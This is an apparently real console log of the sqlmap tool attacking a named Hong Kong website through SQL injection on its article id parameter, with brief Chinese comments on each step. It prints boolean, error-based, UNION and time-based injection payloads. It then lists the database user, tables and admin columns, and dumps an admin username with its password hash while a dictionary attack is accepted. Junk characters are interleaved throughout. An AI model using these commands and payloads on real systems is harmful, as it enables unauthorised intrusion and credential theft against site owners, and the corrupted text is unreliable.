D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" U% {6 j- j7 y" X' {- z. t, v& q
ms "Mysql" --current-user /* 注解:获取当前用户名称
: i/ Z7 M8 ~+ s2 G" R3 K sqlmap/0.9 - automatic SQL injection and database takeover tool
" O9 ~* z O. z& V1 J3 y. V' E http://sqlmap.sourceforge.net starting at: 16:53:54
6 I8 T/ k5 L4 O6 Y[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
- I; B0 B. x8 r3 V% o session file' N/ D6 }8 A7 x& O
[16:53:54] [INFO] resuming injection data from session file
( z& R' E( o5 G; _8 M5 U- m0 `0 s[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
) @1 ]# f! r+ N[16:53:54] [INFO] testing connection to the target url
h/ ]/ }0 D1 N+ ?! Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque6 S* G+ M) S3 P* v* U5 V
sts:
1 ^# ? O! B0 {4 H% r---9 _& l) _3 u( I* L, J. w! X
Place: GET/ c: ~: }) U4 G; R5 U
Parameter: id: ^$ N! d, o; M1 z2 _: X
Type: boolean-based blind
. d6 J* y$ \# T. {. C. F9 | B& W Title: AND boolean-based blind - WHERE or HAVING clause2 Y& B0 |; D% N7 h# a
Payload: id=276 AND 799=7992 R! @9 N& r% c: a
Type: error-based
2 }3 A$ i( m% D8 u, ?8 J; W" n$ K/ w Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: k- T+ O/ S3 W$ H
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 n9 {# W0 {! u0 v120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
' ~; v: H$ c' ^& n [6 { ]- [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), O; b; r* U0 m3 M1 [* C9 m
Type: UNION query9 ~7 h0 P9 L( Z% j8 x0 W
Title: MySQL UNION query (NULL) - 1 to 10 columns8 X# g& U, d2 c3 V, B0 S# I# @
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( b+ |& H' h3 a* m# n
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ Z. W# Z& `% P+ u1 ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( b+ @5 s( v* q* P$ | k+ z. V7 | Type: AND/OR time-based blind7 q* r. q0 V. k+ `/ Z
Title: MySQL > 5.0.11 AND time-based blind- ~5 `4 d5 k8 M- m
Payload: id=276 AND SLEEP(5)
# F9 w( ^- r: |* F c. y---
; M7 f: I1 N; }. y9 ?' d' N7 [[16:53:55] [INFO] the back-end DBMS is MySQL
( l6 D, K$ B+ R3 I' Y2 |web server operating system: Windows+ { C* m7 z6 y5 S* B( p
web application technology: Apache 2.2.11, PHP 5.3.0$ d9 N! w4 C: v; R8 ?3 a
back-end DBMS: MySQL 5.0. Y7 x2 n. L% G0 K6 X/ t0 d$ c
[16:53:55] [INFO] fetching current user
0 x7 y+ H! z5 Q5 C# Wcurrent user: 'root@localhost' 6 ?2 o+ e; C5 {) x" c
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou3 o" U' ?2 V# E2 M4 `* V
tput\www.wepost.com.hk' shutting down at: 16:53:58
$ Y# h" h0 r6 C/ W! I& G0 X* c
; S. B |, z8 X" S( H$ g3 YD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# x7 e9 c4 z0 }1 t0 e
ms "Mysql" --current-db /*当前数据库$ `$ A5 j; v* p
sqlmap/0.9 - automatic SQL injection and database takeover tool% z9 v' v* {3 h) E" V6 ^6 J
http://sqlmap.sourceforge.net starting at: 16:54:16
; }& F3 G. z' g+ n" D[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
5 |! Y& v9 F- d6 b* h) l, u% u session file% k& f* w4 b! [ Z8 c! l1 O4 @, o
[16:54:16] [INFO] resuming injection data from session file
" c* k/ S3 O* L7 B[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
( p4 U! {4 s# b' D. k2 t[16:54:16] [INFO] testing connection to the target url$ N- o Z1 I$ \6 g
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ j6 ~+ W- V; q x( s* ?& Zsts: z0 h2 r6 k" l/ Z) e4 {1 X
---- o+ d/ {4 o8 b3 x. c, p6 [3 Q
Place: GET
x* _4 j0 _6 Z6 z. x" eParameter: id
8 D8 r6 B# r" S Type: boolean-based blind
4 K ?8 x+ Q" g. N7 O Title: AND boolean-based blind - WHERE or HAVING clause$ ? m2 b7 x0 D. G
Payload: id=276 AND 799=799
4 C2 g0 p `- P3 ]5 W Type: error-based
) l# L2 Y' K' g) e" B Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 Y5 v: ]; {; Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ j" n7 A& Z7 ~) W% `3 k+ ] @8 M' C+ g
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) e% V2 @6 l8 a# \" |8 H( q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 |) X5 X* N h% k, I8 P: C Type: UNION query" |/ J- J1 ]/ _- ]& ?2 i
Title: MySQL UNION query (NULL) - 1 to 10 columns' I4 K0 D8 W# j' ^4 d# Q( ]
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
& y6 f' u$ q5 J2 n5 T(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ B" t7 Y4 s2 i. {- ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" F- l1 N5 y( L0 Z! C& ? Type: AND/OR time-based blind
* `2 H: v! k b: [ k+ E Title: MySQL > 5.0.11 AND time-based blind( \* B0 n- @* ?& D7 V* r
Payload: id=276 AND SLEEP(5)
/ x6 v5 R( X* D6 J% y---
( M0 E" D! W- G( {) M6 ~[16:54:17] [INFO] the back-end DBMS is MySQL
: L6 L- K3 V* @& s; }2 Nweb server operating system: Windows3 T* \6 u* u' V0 r# {; W
web application technology: Apache 2.2.11, PHP 5.3.05 a4 d' [* U* f1 k! u0 y. Q
back-end DBMS: MySQL 5.0
8 t8 M; r% \ I+ I: g l! G[16:54:17] [INFO] fetching current database
1 v2 D9 d% P$ _. z, P( q$ C$ Wcurrent database: 'wepost'" i9 e2 |6 m6 V# Z0 r$ e! d
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
- o% H, L# a' K& Q' Y) |tput\www.wepost.com.hk' shutting down at: 16:54:18
4 {7 R* l9 {& m, RD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 m' X! M! X; e2 Jms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
; Z3 m' y7 z) {, \: J sqlmap/0.9 - automatic SQL injection and database takeover tool' f t% z- n$ h& |
http://sqlmap.sourceforge.net starting at: 16:55:25# K e, s) R+ M& B+ y
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as1 L8 A) q5 S ]7 A) U( m+ _/ [# {
session file
. V0 N9 b6 R6 b! o[16:55:25] [INFO] resuming injection data from session file
) s5 a- T: W. L. ~0 I$ i[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file% T! `8 S5 l. ] c: ~) `/ K1 m4 n. w
[16:55:25] [INFO] testing connection to the target url
: F, {" C' K A9 k8 Dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
# W+ P. h' o1 d: w4 l- Q( d) Nsts:
3 I. F, _2 l) Y7 c1 p---
4 U/ ^3 [6 g8 I, j6 s9 g0 S# JPlace: GET
1 K. m s+ w& _Parameter: id( A+ P, x, j4 h, K. b* @
Type: boolean-based blind2 B; ]' w" B' q( |6 U+ i! m, e
Title: AND boolean-based blind - WHERE or HAVING clause0 C( V n) Q5 c8 _+ C
Payload: id=276 AND 799=799
. f; ~% ]- m3 p7 X" g8 c, ` Type: error-based+ A( G, A2 Y# i% A
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 ~- z8 L, O5 V5 K$ P6 A" g/ D
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 }! k- o, I: ]8 E4 J# }120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! d$ V! D, d$ v- M8 m" S
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
. }+ s5 S' a1 w6 Z2 a3 J Type: UNION query9 y8 H# i5 n( S# n
Title: MySQL UNION query (NULL) - 1 to 10 columns9 |3 y: p* u' E& d
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% F1 E0 N. T8 _& A/ j6 ~5 B(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) s/ |; K) S6 ?, B0 k
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 G2 w) I5 u5 Z+ x' a% `6 D8 | Type: AND/OR time-based blind
, K' r' b$ E7 ^8 x5 F Title: MySQL > 5.0.11 AND time-based blind6 a" c! ]8 y! c$ V# p3 m6 T/ i6 P
Payload: id=276 AND SLEEP(5): o& Z: n$ }1 d; b3 ?$ J% m. H' D
---0 v, Q" Q% j4 _1 x5 u
[16:55:26] [INFO] the back-end DBMS is MySQL
- C. o. V6 ], S) v4 u4 Rweb server operating system: Windows
\& {8 x! A7 I. |# ^7 f9 r$ wweb application technology: Apache 2.2.11, PHP 5.3.01 g8 y/ `, s8 a& V% n4 S+ J4 ?
back-end DBMS: MySQL 5.06 @0 k! j4 s5 L
[16:55:26] [INFO] fetching tables for database 'wepost' I& [" E8 {$ P9 [
[16:55:27] [INFO] the SQL query used returns 6 entries' Z& @* _* ~9 m) T6 {
Database: wepost- e x6 C0 g, G# H/ w4 |3 e/ j* I. C
[6 tables]7 R# f8 @- a, B4 X$ ~* X
+-------------+
% P2 g6 y; I6 Q1 c9 U3 T| admin |/ _ A% Q: U/ K; `
| article |( P1 {; v9 w# n5 w3 l& u, j z
| contributor |
# M m4 M- A/ j( W8 \. h$ l% K| idea |, X7 K/ h+ Q& D, U& _- u
| image |
0 \) ~+ F3 C1 T$ U. E' r/ b W| issue |5 F' f) h+ s" {( S1 K* A6 w
+-------------+( o' r1 Y" V1 v" B5 k6 \) _# q" v
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 O) @/ ]4 m3 ^5 qtput\www.wepost.com.hk' shutting down at: 16:55:33
' A7 n5 L- J5 I/ A8 {: E: v* J* Q I5 f7 w q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 w8 l4 j. {5 W3 y$ pms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
" J3 C/ A' V2 o+ y5 V) r sqlmap/0.9 - automatic SQL injection and database takeover tool
& B: G' k5 t0 f, C- A f @" O: Q http://sqlmap.sourceforge.net starting at: 16:56:06
7 D9 W: P1 U9 S- y- e6 G' X/ csqlmap identified the following injection points with a total of 0 HTTP(s) reque5 b3 a/ ^3 h8 Y" S$ q: l$ F
sts:7 r; N# }; \$ J4 F3 P/ l- G
---
" B/ n& M& f% o% TPlace: GET1 H: `0 h6 J) ]# k/ A1 M- k
Parameter: id9 r# Q/ y3 n' R" P
Type: boolean-based blind
: l$ c) i+ e, x. a: o Title: AND boolean-based blind - WHERE or HAVING clause; ], j% V6 S- W }) w( g# ]
Payload: id=276 AND 799=799. m) b" q) b. l
Type: error-based/ L" @% m; P, t0 ]) z6 h
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
' {( h- L" ]/ H% y% x) Y. Q( L Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 t- q% g3 D, R8 [- L
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
' v! \6 X; W5 P2 }& m2 F' z! X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" g! R/ P. M6 M+ c
Type: UNION query* c- ]( N4 g. i6 t
Title: MySQL UNION query (NULL) - 1 to 10 columns* V O4 ~3 i( R
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& a* P# v1 j2 m& S
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 O! g2 j3 t! ]/ z! LCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; {& Q! S8 F1 D, h
Type: AND/OR time-based blind' y" g& ?$ H; F: q; k7 T% T+ @
Title: MySQL > 5.0.11 AND time-based blind' F% _' d& v5 i$ O: X# f3 o
Payload: id=276 AND SLEEP(5)9 m+ i/ K& }7 O$ L0 I$ s* u0 L
---0 l! e9 R: h) Y) m3 X; y
web server operating system: Windows
% K0 u: V% G' }4 Uweb application technology: Apache 2.2.11, PHP 5.3.0
. i) m, w8 I4 z* [% |$ y0 k6 {back-end DBMS: MySQL 5.0
& e& G. g: |, r& y1 U9 C[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
, Q0 \) ]# e. e5 B* X5 ^" f# Sssion': wepost, wepost, m/ q; V6 B' q& d: U8 I1 }
Database: wepost
. }5 d7 f5 k' i/ r9 @0 [0 |$ r0 STable: admin) x$ o b) E( {
[4 columns]0 ^! @& z" N, q. S3 a& Z$ N
+----------+-------------+, N4 f L" [+ w! ~+ R4 e% L H2 z
| Column | Type |
$ z! ]& @* G& G5 t- M7 \" K+----------+-------------+
" e' q2 S F3 k6 a K% v k| id | int(11) |
0 [' I* F2 k/ n& E/ u/ G7 a| password | varchar(32) |
5 n2 e f$ T9 y/ v# U| type | varchar(10) |6 ?% |& e3 }. T$ t* Q
| userid | varchar(20) |
9 l- r3 C1 d1 A1 k+----------+-------------+: t' a8 D7 G& m* p
shutting down at: 16:56:19
" ~+ I4 a' a( G( U4 e) R. z8 Q4 q& _; q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 I/ A% y6 {' P/ N1 b1 z8 D o/ cms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
5 L8 ^0 s+ Z8 w4 G7 U9 X( s sqlmap/0.9 - automatic SQL injection and database takeover tool
& s0 z+ G9 T( _) l/ E5 L http://sqlmap.sourceforge.net starting at: 16:57:14
- {5 i. _7 D# x. k7 W1 gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
! J, A, X3 Z' t8 {sts:( d$ [. u5 t- t# R
---
& z1 K6 Z/ K8 ]Place: GET; g& H9 C0 |1 Y) \- r3 [
Parameter: id2 `5 S# F% @* g, c$ X: q& P
Type: boolean-based blind
: G- E5 M! H7 ?$ X Title: AND boolean-based blind - WHERE or HAVING clause
9 V3 A5 d2 A. j% I q Payload: id=276 AND 799=799
& U0 t" b* e- X Type: error-based
1 Q9 V( y% k X2 w/ @ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
* @4 h6 @' y2 P5 o" a4 A Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! [( a) |8 \* C2 v( _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 \2 ^" X" V; l0 X8 O; U
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 k8 H3 N/ j1 ?4 I
Type: UNION query
3 ]! N" b( I9 ]& n& S Title: MySQL UNION query (NULL) - 1 to 10 columns
- Q6 O# T2 w$ Q) G, V Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- U+ x; w/ V V8 b& H- |& H
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 n' E5 Q/ D7 D( T3 a& M I( q- YCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- q! S3 E& @9 e+ h1 z Type: AND/OR time-based blind
0 l: i( m* |, K Title: MySQL > 5.0.11 AND time-based blind
% Q# N4 H" y6 g Payload: id=276 AND SLEEP(5)
2 B8 A1 D, U& j4 Y5 o---
a+ x( @- Q" H# p- U Sweb server operating system: Windows% }. d7 G1 u# G) |- |
web application technology: Apache 2.2.11, PHP 5.3.0
7 d- ^& T g. T+ r8 oback-end DBMS: MySQL 5.0
2 ]/ E' y0 |) O! {4 J2 z" brecognized possible password hash values. do you want to use dictionary attack o$ `; z) Z# i3 I1 W) p* U& `
n retrieved table items? [Y/n/q] y3 x% L1 k2 J, k% B+ u% T* j
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]) o- C( F8 M: N8 p8 ]) @
do you want to use common password suffixes? (slow!) [y/N] y
" D+ i2 p9 T. D8 CDatabase: wepost" u1 @$ b8 u6 F1 {: d) Y0 m2 t8 j
Table: admin
! b) W8 [6 @/ C1 K% [0 K8 M+ I3 k[1 entry]0 w! }/ n) L8 f4 ^# b) u
+----------------------------------+------------+
, I& G) X+ @2 r& W" G; e% M| password | userid |; z9 S* A# ?( V2 C
+----------------------------------+------------+
! f4 O" _; o* t u| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
; [* B) ?, ?1 k% c: _5 ]5 K+----------------------------------+------------+
0 D6 ^+ u. j8 T( I+ {- \" ? shutting down at: 16:58:148 q3 k- s z% B
4 x( D! _ `! `! L% X A
D:\Python27\sqlmap> |